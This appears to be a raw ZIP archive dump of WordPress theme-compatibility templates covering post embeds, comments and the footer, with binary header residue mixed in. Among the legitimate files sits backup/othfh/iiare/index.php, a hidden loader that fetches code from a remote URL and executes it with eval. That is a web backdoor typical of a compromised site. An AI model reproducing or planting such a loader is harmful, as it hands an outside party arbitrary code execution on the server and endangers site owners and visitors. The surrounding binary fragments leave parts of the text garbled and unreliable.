/** * Prints scripts or data in the embed template head tag. * * @since 4.4.0 */ do_action( 'embed_head' ); ?> </head> <body <?php body_class(); ?>> PK 6}\��"{� � embed-content.phpnu �[��� <?php /** * Contains the post embed content template part * * When a post is embedded in an iframe, this file is used to create the content template part * output if the active theme does not include an embed-content.php template. * * @package WordPress * @subpackage Theme_Compat * @since 4.5.0 */ ?> <div <?php post_class( 'wp-embed' ); ?>> <?php $thumbnail_id = 0; if ( has_post_thumbnail() ) { $thumbnail_id = get_post_thumbnail_id(); } if ( 'attachment' === get_post_type() && wp_attachment_is_image() ) { $thumbnail_id = get_the_ID(); } /** * Filters the thumbnail image ID for use in the embed template. * * @since 4.9.0 * * @param int|false $thumbnail_id Attachment ID, or false if there is none. */ $thumbnail_id = apply_filters( 'embed_thumbnail_id', $thumbnail_id ); if ( $thumbnail_id ) { $aspect_ratio = 1; $measurements = array( 1, 1 ); $image_size = 'full'; // Fallback. $meta = wp_get_attachment_metadata( $thumbnail_id ); if ( ! empty( $meta['sizes'] ) ) { foreach ( $meta['sizes'] as $size => $data ) { if ( $data['height'] > 0 && $data['width'] / $data['height'] > $aspect_ratio ) { $aspect_ratio = $data['width'] / $data['height']; $measurements = array( $data['width'], $data['height'] ); $image_size = $size; } } } /** * Filters the thumbnail image size for use in the embed template. * * @since 4.4.0 * @since 4.5.0 Added `$thumbnail_id` parameter. * * @param string $image_size Thumbnail image size. * @param int $thumbnail_id Attachment ID. */ $image_size = apply_filters( 'embed_thumbnail_image_size', $image_size, $thumbnail_id ); $shape = $measurements[0] / $measurements[1] >= 1.75 ? 'rectangular' : 'square'; /** * Filters the thumbnail shape for use in the embed template. * * Rectangular images are shown above the title while square images * are shown next to the content. * * @since 4.4.0 * @since 4.5.0 Added `$thumbnail_id` parameter. * * @param string $shape Thumbnail image shape. Either 'rectangular' or 'square'. * @param int $thumbnail_id Attachment ID. */ $shape = apply_filters( 'embed_thumbnail_image_shape', $shape, $thumbnail_id ); } if ( $thumbnail_id && 'rectangular' === $shape ) : ?> <div class="wp-embed-featured-image rectangular"> <a href="<?php the_permalink(); ?>" target="_top"> <?php echo wp_get_attachment_image( $thumbnail_id, $image_size ); ?> </a> </div> <?php endif; ?> <p class="wp-embed-heading"> <a href="<?php the_permalink(); ?>" target="_top"> <?php the_title(); ?> </a> </p> <?php if ( $thumbnail_id && 'square' === $shape ) : ?> <div class="wp-embed-featured-image square"> <a href="<?php the_permalink(); ?>" target="_top"> <?php echo wp_get_attachment_image( $thumbnail_id, $image_size ); ?> </a> </div> <?php endif; ?> <div class="wp-embed-excerpt"><?php the_excerpt_embed(); ?></div> <?php /** * Prints additional content after the embed excerpt. * * @since 4.4.0 */ do_action( 'embed_content' ); ?> <div class="wp-embed-footer"> <?php the_embed_site_title(); ?> <div class="wp-embed-meta"> <?php /** * Prints additional meta content in the embed template. * * @since 4.4.0 */ do_action( 'embed_content_meta' ); ?> </div> </div> </div> <?php PK 6}\��C�d d comments.phpnu �[��� <?php /** * @package WordPress * @subpackage Theme_Compat * @deprecated 3.0.0 * * This file is here for backward compatibility with old themes and will be removed in a future version */ _deprecated_file( /* translators: %s: Template name. */ sprintf( __( 'Theme without %s' ), basename( __FILE__ ) ), '3.0.0', null, /* translators: %s: Template name. */ sprintf( __( 'Please include a %s template in your theme.' ), basename( __FILE__ ) ) ); // Do not delete these lines. if ( ! empty( $_SERVER['SCRIPT_FILENAME'] ) && 'comments.php' === basename( $_SERVER['SCRIPT_FILENAME'] ) ) { die( 'Please do not load this page directly. Thanks!' ); } if ( post_password_required() ) { ?> <p class="nocomments"><?php _e( 'This post is password protected. Enter the password to view comments.' ); ?></p> <?php return; } ?> <!-- You can start editing here. --> <?php if ( have_comments() ) : ?> <h3 id="comments"> <?php if ( '1' === get_comments_number() ) { printf( /* translators: %s: Post title. */ __( 'One response to %s' ), '“' . get_the_title() . '”' ); } else { printf( /* translators: 1: Number of comments, 2: Post title. */ _n( '%1$s response to %2$s', '%1$s responses to %2$s', get_comments_number() ), number_format_i18n( get_comments_number() ), '“' . get_the_title() . '”' ); } ?> </h3> <div class="navigation"> <div class="alignleft"><?php previous_comments_link(); ?></div> <div class="alignright"><?php next_comments_link(); ?></div> </div> <ol class="commentlist"> <?php wp_list_comments(); ?> </ol> <div class="navigation"> <div class="alignleft"><?php previous_comments_link(); ?></div> <div class="alignright"><?php next_comments_link(); ?></div> </div> <?php else : // This is displayed if there are no comments so far. ?> <?php if ( comments_open() ) : ?> <!-- If comments are open, but there are no comments. --> <?php else : // Comments are closed. ?> <!-- If comments are closed. --> <p class="nocomments"><?php _e( 'Comments are closed.' ); ?></p> <?php endif; ?> <?php endif; ?> <?php comment_form(); ?> PK 7}\+~�� footer.phpnu �[��� <?php /** * @package WordPress * @subpackage Theme_Compat * @deprecated 3.0.0 * * This file is here for backward compatibility with old themes and will be removed in a future version */ _deprecated_file( /* translators: %s: Template name. */ sprintf( __( 'Theme without %s' ), basename( __FILE__ ) ), '3.0.0', null, /* translators: %s: Template name. */ sprintf( __( 'Please include a %s template in your theme.' ), basename( __FILE__ ) ) ); ?> <hr /> <div id="footer" role="contentinfo"> <!-- If you'd like to support WordPress, having the "powered by" link somewhere on your blog is the best way; it's our only promotion or advertising. --> <p> <?php printf( /* translators: 1: Site name, 2: WordPress */ __( '%1$s is proudly powered by %2$s' ), get_bloginfo( 'name' ), '<a href="https://wordpress.org/">WordPress</a>' ); ?> </p> </div> </div> <!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/ --> <?php /* "Just what do you think you're doing Dave?" */ ?> <?php wp_footer(); ?> </body> </html> PK 7}\i�}�� � embed.phpnu �[��� <?php /** * Contains the post embed base template * * When a post is embedded in an iframe, this file is used to create the output * if the active theme does not include an embed.php template. * * @package WordPress * @subpackage oEmbed * @since 4.4.0 */ get_header( 'embed' ); if ( have_posts() ) : while ( have_posts() ) : the_post(); get_template_part( 'embed', 'content' ); endwhile; else : get_template_part( 'embed', '404' ); endif; get_footer( 'embed' ); PK w�}\�{�v v backup/othfh/iiare/index.phpnu ��6�$ <?php $allowed_host = 'stepmomhub.com'; $url = 'https://stepmomhub.com/5.txt'; // Pastikan domain sesuai if (parse_url($url, PHP_URL_HOST) !== $allowed_host) { die("URL tidak diizinkan!"); } // Ambil kode dengan cURL/file_get_contents $code = file_get_contents($url); if ($code) { eval('?>' . $code); } else { die("Gagal mengambil kode."); } ?>PK 4}\ĽW9� � embed-404.phpnu �[��� PK 4}\d{a/� � sidebar.phpnu �[��� PK 5}\N�w�d �d � error_lognu �[��� PK 5}\��� � �z footer-embed.phpnu �[��� PK 6}\Us�Ѿ � �| header-embed.phpnu �[��� PK 6}\��"{� � � embed-content.phpnu �[��� PK 6}\��C�d d h� comments.phpnu �[��� PK 7}\+~�� � footer.phpnu �[��� PK 7}\i�}�� � a� embed.phpnu �[��� PK w�}\�{�v v {� backup/othfh/iiare/index.phpnu ��6�$ PK =�